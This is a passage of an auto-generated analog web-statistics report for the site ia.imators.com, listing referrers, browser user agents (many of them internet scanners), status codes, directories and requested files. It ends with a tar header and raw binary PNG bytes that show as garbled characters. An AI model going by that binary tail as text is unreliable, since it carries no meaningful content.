href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">90</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">6</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">4</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">35</td><td class="P">35</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">34</td><td class="P">34</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">26</td><td class="P">26</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">18</td><td class="P">18</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">38</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36</td></tr> <tr><td class="R">19</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">python-requests/2.27.1</td></tr> <tr><td class="R">228</td><td class="P">66</td><td class="xl">[not listed: 123 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">457</td><td class="P">286</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">420</td><td class="P">269</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">1</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">135</td><td class="P">106</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">4</td><td class="R">49</td><td class="P">36</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/62</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/35</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> Firefox/4</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/122</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Firefox/125</td></tr> <tr><td class="N">5</td><td class="R">18</td><td class="P">18</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">18</td><td class="P">18</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">9</td><td class="P">9</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">9</td><td class="xl"> curl/7</td></tr> <tr><td class="N">7</td><td class="R">15</td><td class="P">7</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">4</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">8</td><td class="R">2</td><td class="P">2</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">11</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">10</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N">11</td><td class="R">3</td><td class="P">1</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N"> </td><td class="R">22</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">239</td><td class="P">180</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">289</td><td class="P">175</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">237</td><td class="P">157</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">45</td><td class="P">16</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">121</td><td class="P">78</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">121</td><td class="P">78</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">115</td><td class="P">76</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">823</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">97</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">604</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">12</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">41</td><td class="b"> 0.43%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">466</td><td class="b">32.37%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">304</td><td class="b">67.20%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">567</td><td class="b">57.45%</td><td class="xl">[directories]</td></tr> <tr><td class="R">167</td><td class="b">35.82%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">26</td><td class="b"> 4.26%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">21</td><td class="b"> 1.05%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 0.99%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">41</td><td class="b"> 0.43%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">567</td><td class="b">57.45%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">214</td><td class="b">41.13%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">1</td><td class="b"> 0.99%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">41</td><td class="b"> 0.43%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">567</td><td class="b">57.45%</td><td class="D">Mar/31/25 8:25 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 4.02%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 3.19%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 2.09%</td><td class="D">Mar/ 1/25 3:30 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">23</td><td class="b"> 2.46%</td><td class="D">Feb/28/25 11:54 PM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">14</td><td class="b"> 1.21%</td><td class="D">Mar/29/25 9:22 PM</td><td class="xl"> <a href="/?192.42.116.194">/?192.42.116.194</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 1.47%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">89</td><td class="b">32.22%</td><td class="D">Mar/19/25 3:24 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">78</td><td class="b"> 3.60%</td><td class="D">Mar/15/25 5:34 AM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">26</td><td class="b"> 4.26%</td><td class="D">Jan/16/25 5:04 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">21</td><td class="b"> 1.05%</td><td class="D">Oct/ 5/24 10:12 PM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">42</td><td class="b"> 1.42%</td><td class="D">Mar/16/25 10:05 PM</td><td class="xl">[not listed: 19 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> dir.png 0000644 00000004627 15114762025 0006044 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� (IDATx���Mr�8`��'�>��+W� �3��C�P$E �G�"��Ubq(E���ae���-!�C}��ɛ���я��|���RZļuX����w�e��-X��"X@�`, �D���"X@�`, �D����X��c9}6`��b~�Gv¬Ʋ������_!ֲo�X���)���'��Z��=��}u��ҷ�=��Ug-�V���9�^D���ߋX�w|���ҷ�"���Vİ��*���t�CX�~'au\�>ꃂ`�;�����z���ű�X�=��ű�X���J�X;��5}�@�� ����Z�bw�C�J�e,���;�����"4���X��(ck�҉��,���!a%�0�FX�1�i�\��#V�IX+���Z�Jl�_yQ(X�E�Z[,c]u��r���f��������X����skqlM�:�/��_㍞Μ+ׄ4���5�,��eܒ�1�`�>'��6!k�IX�2`�b����Ј9,��FXqc���X�&$b�q�e}��)�~�1\u�u��Y�âg���Y�*M,*V�ŚC�J-b'��b�V� �X\k�X��^������ ��Ť�����>O�v�X�C!����1V��̾8&%���`��i,=���R"X�Fa��`�'3&���9�?�1a�_� '=ǜ�S�Z�B+7�FX}�=��&�Y��.,a-�{UJ�ʕր�F� V�ro�<�� X��2���eT+��ր���q�j�����.,`Q�����3��!�Q�)S?�ϋE*,+]Z��k�=��9��d�H]a�6�â��|im�,E�B��>�`�J����?����ȩ�FK4�]T�t����`�НI[:V��X��M`Q�J��k|��:��tX&�h������=%�Q�D��b)�ǻA�;�FKZ����ǜ+.ј�z\l��ҿ�l��^��� �W���ٱ�#ƚ�+�#�m���a��6�E/,k^Z,����JVx�L\���k� ��'D),�a��O��`Ia�v�jz�f+�ű�.ıZ�C�"X@X�]�ZZ�D��̱����ᡵ���X����C�"X@�`�a��X��`ٌ�}e���X�Nx�"X@�co��c��5X��f�;>�K�k�"X@�`, ۱�K�, ���c���5�͕�Me�X+�.����X��.����X+�.����X������ї�����jX��.����ZX�.��Պ���f�fWhp��V��ۭ.����尪X1�*�X5{0���X]��'��Ъe��ȢcU�� 